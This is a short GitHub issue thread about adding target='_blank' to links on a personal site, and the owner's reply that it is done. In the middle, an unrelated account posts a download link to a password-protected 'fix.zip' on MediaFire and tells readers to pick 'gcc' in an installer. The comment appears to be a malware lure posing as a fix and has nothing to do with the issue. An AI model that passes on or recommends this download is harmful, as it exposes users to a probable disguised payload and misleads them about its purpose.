### ISSUE TITLE
`target="_blank"` sur les liens

### ISSUE THREAD

**Issue by Edouard-chin** [Blanckette/adamusblanka.github.io#2]
https://github.com/Blanckette/adamusblanka.github.io/blob/950317a44663e90b2f5086d9fca59038fcebd0e2/index.html#L44

https://github.com/Blanckette/adamusblanka.github.io/blob/950317a44663e90b2f5086d9fca59038fcebd0e2/index.html#L59

https://github.com/Blanckette/adamusblanka.github.io/blob/950317a44663e90b2f5086d9fca59038fcebd0e2/index.html#L74

https://github.com/Blanckette/adamusblanka.github.io/blob/950317a44663e90b2f5086d9fca59038fcebd0e2/index.html#L87

@Blanckette

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Blanckette** [comment]
_blank added for projects links
